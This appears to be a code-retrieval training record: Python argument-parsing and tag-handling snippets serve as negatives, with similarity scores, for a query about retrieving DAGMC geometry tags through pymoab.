ArgumentParser(prog='dax_launch', description=__description__)\n ap.add_argument(dest='settings_path', help='Settings Path')\n ap.add_argument('--logfile', dest='logfile',\n help='Logs file path if needed.', default=None)\n _help = 'Project ID from XNAT to run dax_update on locally (only one \\\nproject).'\n ap.add_argument('--project', dest='project', help=_help, default=None)\n _help = 'list of sessions label from XNAT to run dax_launch on locally.'\n ap.add_argument('--sessions', dest='sessions', help=_help, default=None)\n ap.add_argument('--writeonly', dest='writeonly', action='store_true',\n help='Only write job files without launching them.')\n _help = 'Folder to store the PBS when using --writeonly. Default: \\\nRESULTS_DIR/TRASH.'\n ap.add_argument('--pbsfolder', dest='pbsfolder', help=_help, default=None)\n ap.add_argument('--nodebug', dest='debug', action='store_false',\n help='Avoid printing DEBUG information.')\n ap.add_argument('--no_qsub', dest='no_qsub', action='store_true',\n help='Run the jobs locally on your computer in serial.')\n return ap.parse_args()", "def parseArguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_folder',\n help='Path of the folder where output files should be written.')\n parser.add_argument('--partition_id',\n help='ID of the computer partition to collect data from.')\n parser.add_argument('--collector_db',\n help='The path of slapos collect database.')\n\n return parser.parse_args()", "def _parse_args(self, argv: List[str]):\n if sys.version_info >= (3, 0):\n parser = ArgumentParser(allow_abbrev=False)\n else:\n parser = ArgumentParser()\n\n parser.add_argument(\"--accesskey\", \"--access-key\", help=_ACCESS_KEY_HELP)\n parser.add_argument(\"--workspace_id\", help=_WORKSPACE_ID_HELP)\n parser.add_argument(\"--tenant_id\", help=_TENANT_ID_HELP)\n parser.add_argument(\"--url\", help=_URL_HELP)\n parser.add_argument(\"--gateway_url\", help=_GATEWAY_URL_HELP)\n parser.add_argument(\"--aad\", action=\"store_true\", help=_AAD_HELP)\n parser.add_argument(\"--verbose\", action=\"store_true\", help=_VERBOSE_HELP)\n parser.add_argument(\n \"--performance\", action=\"store_true\", help=_PERFORMANCE_HELP\n )\n parser.add_argument(\"--log\", nargs=\"+\", help=_LOG_HELP)\n parser.add_argument(\"--record\", nargs=1, default=None, help=_RECORD_HELP)\n\n args, remainder = parser.parse_known_args(argv[1:])\n\n if args.aad:\n self.use_aad = args.aad\n\n if args.accesskey is not None:\n self.accesskey = args.accesskey\n\n if args.workspace_id is not None:\n self.workspace_id = args.workspace_id\n\n if args.tenant_id is not None:\n self.tenant_id = args.tenant_id\n\n if args.url is not None:\n self.url = args.url\n\n if args.gateway_url is not None:\n self.gateway_url = args.url\n\n if args.verbose:\n self.verbose = args.verbose\n log.set_enable_all(args.verbose)\n\n if args.performance:\n # logging::log().set_enabled(true);\n # logging::log().set_enable_all_perf(true);\n pass\n\n if args.log is not None:\n for domain in args.log:\n log.set_enabled(domain)\n\n if args.record:\n self.record_file = args.record[0]\n self.record_enabled = True\n\n if remainder is not None:\n pass", "def parseArgs ():\n independentBaseName = None\n dependentBaseName = None\n independentTSID = None\n dependentTSID = None\n statisticsFile = None\n nEquations = None\n logFile = None\n #\n # Loop through command line arguments\n for arg in sys.argv:\n parts = arg.split('=')\n if ( (parts == None) or (len(parts) != 2) ):\n # Not an arg=value command line argument\n continue\n argName = parts[0].upper()\n argValue = parts[1]\n if ( argName == 'DEPENDENTBASENAME' ):\n dependentBaseName = argValue\n elif ( argName == 'DEPENDENTTSID' ):\n dependentTSID = argValue\n elif ( argName == 'INDEPENDENTBASENAME' ):\n independentBaseName = argValue\n elif ( argName == 'INDEPENDENTTSID' ):\n independentTSID = argValue\n elif ( argName == 'LOGFILE' ):\n logFile = argValue\n elif ( argName == 'NUMBEROFEQUATIONS' ):\n nEquations = int(argValue)\n elif ( argName == 'STATISTICSFILE' ):\n statisticsFile = argValue\n return ( independentBaseName, dependentBaseName, independentTSID, dependentTSID,\n statisticsFile, nEquations, logFile )", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Helps analyze articles.')\n parser.add_argument('--config', default='config.yaml',\n help='Configuration file for the options of this script')\n parser.add_argument('--search', default=None, type=str,\n help='Search for text in the articles')\n parser.add_argument('--case-sensitive', action='store_true',\n help='Makes search case-senstive (only applicatble to --search)')\n parser.add_argument('--list', default=None, type=str,\n help='List [title|authors|date|word-count|author|excerpt|content] of the articles')\n parser.add_argument('--sort', action='store_true',\n help='Sorts output (only applicable to --list).')\n parser.add_argument('--sort-by', default=None, type=str,\n help='Sorts output by another attribute [title|author|date] (only applicable to --list)')\n parser.add_argument('--statistics', action='store_true',\n help='Gives basic statistics about the articles.')\n parser.add_argument('--count-articles', action='store_true',\n help='Counts the total number of articles')\n parser.add_argument('--count-words', action='store_true',\n help='Counts the total number of words')\n parser.add_argument('--count-paragraphs', action='store_true',\n help='Counts the total number of paragraphs')\n parser.add_argument('--count-by-author', action='store_true',\n help='Counts the number of articles by each author')\n parser.add_argument('--count-by-year', action='store_true',\n help='Counts the number of articles bucketed by year')\n parser.add_argument('--count-by-months', default=None, type=int,\n help='Counts the number of articles bucketed by number of months')\n \n return parser, parser.parse_args()", "def _parse_cli_opts(self, args):\n self._args = args\n for opt, group in self._all_cli_opts():\n opt._add_to_cli(self._oparser, group)\n\n return self._parse_config_files()", "def parse_arguments(args=sys.argv[1:]):\n \n parser = argparse.ArgumentParser()\n \n parser.add_argument('-i', '--input',\n help=\"Path of input file to read. Default: {d}\".format(d=INPUT_FILE),\n default=INPUT_FILE)\n \n return parser.parse_args(args)", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--version',\n metavar=\"<str>\",\n help=\"Input data version number\",\n type=str,\n required=True\n )\n args = parser.parse_args()\n return args", "def prepare_arguments(self, parser):\n pass" ]
[ "0.7812506", "0.7636276", "0.7270536", "0.720011", "0.71367455", "0.712731", "0.6990735", "0.6976223", "0.69415474", "0.6897431", "0.6839291", "0.68086874", "0.67994547", "0.67840666", "0.6775619", "0.67488694", "0.6741559", "0.6727123", "0.67215323", "0.67038643", "0.6699622", "0.6695919", "0.6695863", "0.6676773", "0.6675058", "0.66583896", "0.6646412", "0.66148144", "0.6613735", "0.6605347", "0.66045964", "0.65927714", "0.6586825", "0.65851", "0.658443", "0.657775", "0.6576862", "0.65677243", "0.6566156", "0.6559208", "0.6552457", "0.65471655", "0.65442044", "0.65365887", "0.65312624", "0.6522934", "0.65219563", "0.6513623", "0.6510889", "0.6507839", "0.6504214", "0.6503864", "0.65007937", "0.64974546", "0.6487267", "0.6487098", "0.6485572", "0.6484834", "0.6480681", "0.6480384", "0.6477869", "0.6476365", "0.64704823", "0.64659965", "0.64472675", "0.6442889", "0.6438298", "0.6435837", "0.64357597", "0.6428384", "0.6420766", "0.64182", "0.64180195", "0.6416107", "0.64159656", "0.6414199", "0.64126444", "0.64072067", "0.6400285", "0.6391304", "0.63893265", "0.6381673", "0.63796765", "0.6377731", "0.6374172", "0.6372907", "0.63725466", "0.63721657", "0.6367823", "0.63672924", "0.63654506", "0.6358865", "0.6353488", "0.6350645", "0.63481206", "0.63479114", "0.6346968", "0.6341899", "0.6329404", "0.63290626", "0.6327186" ]
0.0
-1
Check if directories on the path, and create them if not.
def check_dir(path): if not os.path.exists(path): os.makedirs(path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _check_path(path):\n os.system(\"if [ ! -d \" + path + \" ]; then mkdir -p \" + path + \"; fi\")", "def _check_dirs(self):\r\n for dir in [self.papers_dir,\r\n self.buffer_dir]:\r\n if not os.path.exists(dir):\r\n message = f'Dir not exists: {dir}. Making it.'\r\n logging.warning(message)\r\n os.mkdir(dir)", "def create_dir_if_necessary(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise", "def ensure_dirs_exist(path):\n os.makedirs(path, exist_ok=True)", "def make_dirs(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def checkDirectory(path,logger):\n newPath = completePath(path)\n if not os.path.exists(newPath):\n os.makedirs(newPath)\n if (logger):\n print(\"Did not found required directories. Creating them...\")\n else:\n if (logger):\n print(\"Found the required directories!\")", "def make_dirs(path):\n\tif not os.path.exists(path):\n\t\treturn os.makedirs(path)", "def checkExistenceDir(path):\n path = os.path.abspath(path)\n if not os.path.isdir(path):\n logger.warning(\n \"Directory {} does not seem to exist, creating one.\".format(path)\n )\n os.mkdir(path)", "def _mkdir_if_not_exist(path):\n if not(os.path.isdir(path)):\n os.mkdir(path)\n else:\n _logger.info('Skipping existing directory %s' % path)", "def ensure_folders_if(path, condition=True):\n if not os.path.exists(path) and condition:\n os.makedirs(path)", "def _ensure_dirs(dirpath):\n if not os.path.isdir(dirpath):\n if os.path.exists(dirpath):\n err = \"log path ({}) exists but is not a directory\"\n raise ConfigError(err.format(dirpath))\n os.makedirs(dirpath, 0o777)", "def check_path(dir_path):\n if not os.path.exists(dir_path):\n os.mkdir(dir_path, 0755)", "def make_dirs_or_not(dirpath: Union[PathOrStrType]):\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)", "def create_directories(path):\n try:\n os.makedirs(path)\n\n except OSError as e:\n\n if e.errno != errno.EEXIST:\n logging.error(str(e))\n raise", "def mkdir_if_not_exists(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def create_folder_if_needed(path):\n if os.path.exists(path):\n print(\"{} dir exists\".format(path))\n else:\n print(\"{} dir does not exist. Creating dir.\".format(path))\n os.mkdir(path)", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else: raise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\r\n try:\r\n os.makedirs(path)\r\n except OSError as exc: # Python >2.5\r\n if exc.errno == errno.EEXIST and os.path.isdir(path):\r\n pass\r\n else:\r\n raise", "def makedirectory(path):\n\n exist_ok = True\n if not exist_ok and os.path.isdir(path):\n with contextlib.suppress(OSError):\n Path.mkdir(path, parents=True)", "def exist_ok_makedirs (path, mode=0777):\n if not os.path.isdir (path):\n head, tail = os.path.split (path)\n if not tail:\n head, tail = os.path.split (head)\n if head and tail:\n exist_ok_makedirs (head, mode)\n exist_ok_mkdir (path, mode)", "def ensure_dir_exists(path: Union[str,Path]) -> None:\n# path = str(path)\n assert not os.path.isfile(path)\n os.makedirs(path, exist_ok=True)\n assert os.path.isdir(path)", "def mkdirs(path):\n\tif not os.path.exists(path):\n\t\tos.makedirs(path)", "def mkdir_p(self, path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def make_dir_if_needed(path):\n\n if not os.path.exists(path):\n os.makedirs(path)\n return path", "def assure_path_exists(self, path):\n\n dir = os.path.dirname(path)\n if not os.path.exists(dir):\n os.makedirs(dir)", "def make_directories(file_path):\n logger.info(\"Create all directories in the path %s\", file_path)\n if not os.path.exists(file_path):\n os.makedirs(file_path, exist_ok=True)\n else:\n logger.warning(\"Cannot create directories %s. The directory already exists\", file_path)", "def EnsureDirExists(path):\n try:\n os.makedirs(os.path.dirname(path))\n except OSError:\n pass", "def check_dir(path):\n \n if not os.path.exists(path):\n os.makedirs(path)\n print path", "def ensure_dir(root, path):\n full_path = root\n for seg in path.split(os.sep):\n full_path += os.sep + seg\n if os.path.exists(full_path):\n if not os.path.isdir(full_path):\n raise ValueError(\"'{}' is not a directory\".format(full_path))\n else:\n os.makedirs(full_path)", "def maybe_make_dir(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError, e:\n if e.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def ensure_dir_exists(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def build_dirs(self, path):\n if not os.path.exists(path):\n os.makedirs(path)\n return path", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\n\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\n # http://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def ensure_directory_exists(path):\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.makedirs(directory, exist_ok=True)\n return", "def ensure_directory(path):\n\tdir_path = os.path.dirname(path)\n\tif os.path.exists(dir_path):\n\t\treturn\n\tensure_directory(dir_path)\n\ttry:\n\t\tos.mkdir(dir_path)\n\texcept OSError as e:\n\t\t# Ignore if EEXISTS. This is needed to avoid a race if two getters run at once.\n\t\tif e.errno != errno.EEXIST:\n\t\t\traise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def ensure_dirpath_exists(path: Path) -> Path:\n assert path\n out_path: Path = path\n\n if not out_path.exists():\n out_path.mkdir(parents=True, exist_ok=True)\n\n return out_path", "def make_sure_path_exists(input_path: Union[Path, str], isfile: bool = False):\n input_path = Path(input_path)\n\n if isfile:\n directory = input_path.parent\n else:\n directory = input_path\n\n if directory.exists():\n return\n else:\n directory.mkdir(parents=True)", "def make_dir(path):\n if os.path.exists(path):\n return False\n else:\n os.makedirs(path, exist_ok=True)\n return True", "def _mkdir_p(path):\n if not osp.exists(path):\n os.makedirs(path)", "def makeDirs(self, inPath):\n\n if not os.path.exists(inPath): os.mkdir(inPath)", "def MakeDir(path):\n if os.path.exists(path):\n return False\n else:\n os.makedirs(path)\n return True", "def make_dirs(dirpath, debug=False):\n\tif not os.path.exists(dirpath):\n\t\ttry:\n\t\t\tos.mkdir(dirpath)\n\t\texcept OSError as e:\n\t\t\tif debug:\n\t\t\t\tprint(e)\n\t\t\t(head, tail) = os.path.split(dirpath)\n\t\t\tif '/' not in head or os.path.exists(head):\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tif(make_dirs(head)):\n\t\t\t\t\treturn make_dirs(dirpath)\n\treturn dirpath", "def check_path(path, verbose = False):\n if (not os.path.isdir(path)):\n if (verbose):\n log(LogType.SERVICE, 'No ' + path + '. Creating. . .')\n os.mkdir(path, 0o777)", "def mkdir_if_not_exist(path): #@save\n if not isinstance(path, str):\n path = os.path.join(*path)\n if not os.path.exists(path):\n os.makedirs(path)", "def makeDir(path):\r\n\r\n try:\r\n os.makedirs(path)\r\n except OSError as exc:\r\n if exc.errno == errno.EEXIST and os.path.isdir(path):\r\n pass\r\n else:\r\n raise", "def checkfolder(paths):\n\tpaths = paths if isinstance(paths, list) else [paths]\n\t\n\tdef creat_dir(x):\n\t\tx = Path(x)\n\t\tif x.is_dir():\n\t\t\tprint(f\"Dir {x} already exists\")\n\t\telse:\n\t\t\tPath.mkdir(x)\n\t\t\tprint(f\"Created new dir {x}\")\n\t\n\tlist(map(creat_dir, paths))", "def __make_dirs(path, mode=0o777):\n\n try:\n os.makedirs(path, mode=mode)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise Ai1wmError('error creating a directory: {}, error: {}'.format(path, e))\n return path", "def ensure_dir(path):\n parent = os.path.dirname(path)\n if not os.path.exists(parent):\n os.makedirs(parent)", "def mkdir_p(path):\n try:\n os.makedirs(path) # , exist_ok=True\n except OSError:\n pass", "def ensuredir(path):\n # Copied from sphinx.util.osutil.ensuredir(): BSD licensed code, so it's OK\n # to add to this project.\n EEXIST = getattr(errno, 'EEXIST', 0)\n try:\n os.makedirs(path)\n except OSError as err:\n # 0 for Jython/Win32\n if err.errno not in [0, EEXIST]:\n raise", "def makedir(path):\n try:\n os.makedirs(path)\n except OSError:\n # Path already exists or cannot be created\n if not os.path.isdir(path):\n raise", "def ensure_dir(path):\n\n \n try:\n os.makedirs(path)\n except (EnvironmentError) as e:\n if not(e.errno == errno.EEXIST and \n e.filename == path):\n raise\n return", "def mkdir(path):\n\tif not Path(path).exists():\n\t\tPath(path).mkdir(parents=True, exist_ok=True)", "def dir_exists(directories_path):\n if type(directories_path) is not list:\n directories_path = [directories_path]\n\n for directory in directories_path:\n if not exists(directory):\n makedirs(directory)\n print(constants.C_WARNING, 'Created directory:', directory, constants.C_ENDC)", "def create_dir_if_doesnt_exist(dir_path):\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n return", "def create_path(self, path):\n path_list = path.split(\"/\")\n done_path = self.parent_folder + \"/\"\n\n for directory in path_list:\n try:\n os.mkdir(done_path + directory + \"/\")\n except FileExistsError:\n done_path += directory + \"/\"", "def check_dir(path, create = True):\n if os.path.exists(path):\n if os.path.isdir(path):\n return path\n else:\n return False\n if create:\n msg = \"Creating directory: '%s'\" % (path)\n print msg\n log.info(msg)\n os.mkdir(path)\n else:\n return False", "def createFoldersFromPath(path):\n create = dirname(realpath(path))\n if not os.path.exists(create):\n os.makedirs(create)", "def prepare_dir(path, empty=False):\n\n def create_dir(path):\n \"\"\"\n Creates a directory\n :param path: string\n :return: nothing\n \"\"\"\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n if not os.path.exists(path):\n create_dir(path)", "def MaybeMakeDirectory(*path):\n file_path = os.path.join(*path)\n try:\n os.makedirs(file_path)\n except OSError, e:\n if e.errno != errno.EEXIST:\n raise", "def _check_is_dir(self, path):\n if os.path.isdir(path) and os.path.exists(path):\n self.__save_dir = path\n else:\n print(f'No existing directory found. Creating new directory at {path}')\n os.mkdir(path)\n self.__save_dir = path", "def ensure_dir(path: str):\n\n d = os.path.dirname(path)\n if not os.path.exists(d):\n os.makedirs(d)", "def maybe_makedirs(path_to_create):\n try: \n os.makedirs(path_to_create)\n except OSError:\n if not os.path.isdir(path_to_create):\n raise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST:\n pass\n else: raise", "def safe_mkdirs(path):\n if not os.path.exists(path):\n try:\n os.makedirs(path)\n except Exception as e:\n raise IOError(\n (\"Failed to create recursive directories: \"\n \" {}\".format(path)\n )\n )", "def dirCheck(dirPath):\n if not os.path.exists(dirPath):\n os.mkdir(dirPath)\n return dirPath", "def direxists(ipath):\n if not ipath.endswith(\"/\"):\n ipath = ipath + \"/\"\n if not os.path.exists(ipath):\n try:\n os.mkdir(ipath)\n except os.error:\n logging.error(\"Can't create directory %s!\", ipath)\n else:\n if not os.access(os.path.dirname(ipath), os.W_OK):\n logging.error(\"Can't write to directory %s! Check permissions.\", ipath)\n return False\n return True", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST:\n pass\n else:\n raise", "def mkdir_if_notexists(path):\n try:\n os.mkdir(path)\n except FileExistsError:\n pass", "def mkdir(path):\n try: \n os.mkdir(path)\n except OSError:\n if not os.path.isdir(path):\n raise", "def safe_mkdir(path):\n # avoid race condition\n while True:\n try:\n if os.path.isdir(path):\n return\n os.makedirs(path)\n break\n except FileExistsError:\n sleep(0.1)", "def checking_path():\n path = Path(\"phonebook\")\n try:\n path.mkdir(parents=True, exist_ok=False)\n except FileExistsError:\n pass\n else:\n pass", "def create_directories(path):\n directories = ['images', 'pdf', 'videos', 'audio', 'spreedsheet', 'text', 'scripts', 'docs', 'other']\n for directory in directories:\n create_directory(path, directory)", "def mkdir_p(path):\n\n if os.path.exists(path):\n return\n\n par = os.path.split(path)[0]\n if os.path.exists(par):\n os.mkdir(path)\n getLogger(__name__).debug('created directory: %s' % path)\n else:\n mkdir_p(par)\n os.mkdir(path)", "def make_dir_if_need(path):\n folder, filename, ext = split_path(path)\n if len(folder) > 0 and not os.path.exists(folder):\n try:\n os.makedirs(folder)\n except Exception as e:\n print(e)\n sys.stderr.write('folder:{0} is not valid path'.format(folder))\n return sanitize_path(path)", "def make_sure_path_exists(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise", "def mkdir_p(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def ensure_dir(path, raise_=False): # pragma: no cover\n if not os.path.isdir(path):\n if os.path.exists(path):\n LOGGER.error(\"Output dir %s exists and is not a folder!\")\n if raise_:\n raise RuntimeError(\"Output dir %s exists and is not a folder!\")\n return False\n os.makedirs(path)\n return True", "def make_sure_path_exists(path):\n try: os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST: raise", "def _mkdir_if_not_exist(path):\n if not os.path.exists(path):\n try:\n os.makedirs(path)\n except OSError as e:\n if e.errno == errno.EEXIST and os.path.isdir(path):\n logger.warning(\n 'be happy if some process has already created {}'.format(\n path))\n else:\n raise OSError('Failed to mkdir {}'.format(path))", "def dirChecking(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)", "def ensuredirs(dpath, *dpaths):\n try:\n makedirs(path.join(dpath, *dpaths))\n except OSError as e:\n if e.errno != EEXIST:\n raise # Re-raise the exception.", "def maybe_makedirs(path_to_create):\n try:\n os.makedirs(path_to_create)\n except OSError:\n if not os.path.isdir(path_to_create):\n raise", "def create_dir(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def _create_paths(paths):\n for path in paths:\n _mkdir_if_not_exist(path)", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError:\n if not os.path.isdir(path):\n raise\n # in python 3 we could just do\n # os.makedirs(path, exist_ok=True)", "def try_makedirs(path):\n\n try:\n makedirs(path)\n except OSError:\n pass", "def prepare_folder(path):\n if not os.path.isdir(path):\n os.makedirs(path)", "def exist_ok_mkdir (path, mode=0777):\n try:\n os.mkdir (path, mode)\n except OSError:\n if not os.path.isdir (path):\n raise", "def create_directory_if_not_exists(directory_path):\n os.makedirs(directory_path, exist_ok=True)", "def create_dir():\n if check_dir_exist():\n return False\n else:\n os.makedirs(path_structure)\n return True", "def _validate_path(dir_path: str) -> None:\n if os.path.exists(dir_path):\n return\n\n logger.info('Creating directory: %s', dir_path)\n os.mkdir(dir_path)", "def makedir(path: str) -> None:\n if not os.path.exists(path):\n # noinspection PyBroadException\n try:\n os.makedirs(path)\n except OSError:\n pass" ]
[ "0.7897075", "0.78796077", "0.7873436", "0.7844147", "0.7843228", "0.78394854", "0.7821767", "0.7799039", "0.77543813", "0.77469003", "0.77352756", "0.7700688", "0.7690964", "0.7684836", "0.7626432", "0.75970924", "0.7586215", "0.75739735", "0.75739735", "0.75736177", "0.75710833", "0.756884", "0.7566628", "0.7566057", "0.7565454", "0.7558784", "0.7557435", "0.75571436", "0.7553918", "0.75490224", "0.7539255", "0.752192", "0.7510897", "0.75040776", "0.75026417", "0.74931616", "0.74931616", "0.74925935", "0.74890953", "0.74811673", "0.7466876", "0.74579984", "0.74448496", "0.7443894", "0.7428906", "0.74156386", "0.7413384", "0.7407306", "0.73997676", "0.73694044", "0.7358448", "0.73533666", "0.7346625", "0.73418385", "0.7341371", "0.7327121", "0.7326125", "0.73143333", "0.7313818", "0.73127985", "0.73102796", "0.7309287", "0.7301042", "0.7291357", "0.7282994", "0.72817487", "0.7275389", "0.72743386", "0.7273983", "0.72736806", "0.72609764", "0.72543514", "0.72524047", "0.7250307", "0.7240143", "0.72393805", "0.7227063", "0.7213775", "0.7209802", "0.71967953", "0.7186346", "0.71802145", "0.7179959", "0.7174866", "0.7172299", "0.71705294", "0.7164276", "0.7163732", "0.7161276", "0.7155368", "0.7151645", "0.71440053", "0.71419066", "0.7141208", "0.71360505", "0.7135794", "0.71339047", "0.71248835", "0.7121395", "0.7115021" ]
0.78439754
4
Get a dictionary with the important tags for DAGMC geometries inputs
def get_dagmc_tags(my_core): dagmc_tags = {} dagmc_tags['geom_dim'] = my_core.tag_get_handle('GEOM_DIMENSION', size=1, tag_type=types.MB_TYPE_INTEGER, storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # geometric dimension dagmc_tags['category'] = my_core.tag_get_handle('CATEGORY', size=32, tag_type=types.MB_TYPE_OPAQUE, storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # the category dagmc_tags['global_id'] = my_core.tag_get_handle('GLOBAL_ID', size=1, tag_type=types.MB_TYPE_INTEGER, storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # id return dagmc_tags
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTag(self, inputs, tag):\n result = {}\n for into in inputs:\n for i in into:\n if i in self.sim.agents:\n agentTags = self.sim.agents[i].access[\"tags\"]\n if tag in agentTags:\n result[i] = agentTags[tag]\n return result", "def tags_dict(self):\n return ({'name': 'tag', 'attrs': {'k': k, 'v': v}} for k, v in self.tags.items())", "def getFeatureDicts(self):\n return [self.data.getWordTagDict(), self.data.tags_trigrams, self.data.tags_bigrams]", "def tags():", "def comando_gne(self):\r\n if args.tag:\r\n\t if args.value:\r\n tags = self.alterar_gne_framework(args.tag, args.value)\r\n\t else:\r\n tags = self.ler_gne_framework(args.tag)\r\n\t return {args.tag:tags[args.tag]} # Ex: {\"nnf\":115}\r", "def tag_dict(self):\n tag_dict = dict()\n for document in self.documents:\n for tag in document.tags:\n tag_type = tag['tag']\n tag_dict[tag_type] = tag_dict.get(tag_type, []) + [tag]\n return tag_dict", "def get_tag_dict(self):\n return self.tag_dict", "def get_tags(self) -> Union[Dict[str, str], None]:\n # read the original value passed by the command\n tags = self.raw_param.get(\"tags\")\n # In create mode, try to read the property value corresponding to the parameter from the `mc` object.\n if self.decorator_mode == DecoratorMode.CREATE:\n if self.mc and self.mc.tags is not None:\n tags = self.mc.tags\n\n # this parameter does not need dynamic completion\n # this parameter does not need validation\n return tags", "def get_tags_gff(tagline):\n\n tags = dict()\n for t in tagline.split(';'):\n tt = t.split('=')\n tags[tt[0]] = tt[1]\n return tags", "def feature_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]:\n return pulumi.get(self, \"feature_tags\")", "def feature_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]:\n return pulumi.get(self, \"feature_tags\")", "def get_tags(self) -> Dict:\n return self.orthanc.get_instance_tags(self.identifier)", "def get_attached_tags(self, complexe_tags):\n attached_tags = []\n for tags in tqdm(complexe_tags):\n tokenized_tags = self.tokenize(tags)\n intersection_tags = self.list_intersection(tokenized_tags)\n attached_tags.append(intersection_tags)\n return attached_tags", "def tag(self):\n \n tag = super(self.__class__, self).tag();\n tag = als.tag_join(tag, als.stra(self.strain));\n tag = als.tag_join(tag, als.stra(self.dtype));\n tag = als.tag_join(tag, 'w=%s' % als.stra(self.wid)); \n tag = als.tag_join(tag, 's=%s' % als.stra(self.stage));\n #tag = analysis.tag_join(tag, 'l=%s' % analysis.stra(self.label)); \n\n return tag;", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def getFeatureDicts(self):\n pass", "def tag_with_features(self, efeats):\n if len(efeats)==3:\n print \"d\"\n\n # build array of dicts\n state_dicts = []\n for e_phi in efeats: \n state_dicts = self.viterbi1(e_phi, state_dicts)\n \n \n # trace back\n yyhat, phis = self.traceback(efeats, state_dicts)\n assert len(efeats)==len(yyhat)#len(yyhat), \n\n return (yyhat, phis)", "def simplified_tags(self) -> Dict:\n return dict(self.client.get_instances_id_tags(self.id_, params={'simplify': True}))", "def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanVirtualNodeGroupLaunchSpecificationTagArgs']]]]:\n return pulumi.get(self, \"tags\")", "def feature_dist_func_dict():\n return {\"tanimoto_dissimilarity\": tanimoto_dissimilarity}", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return 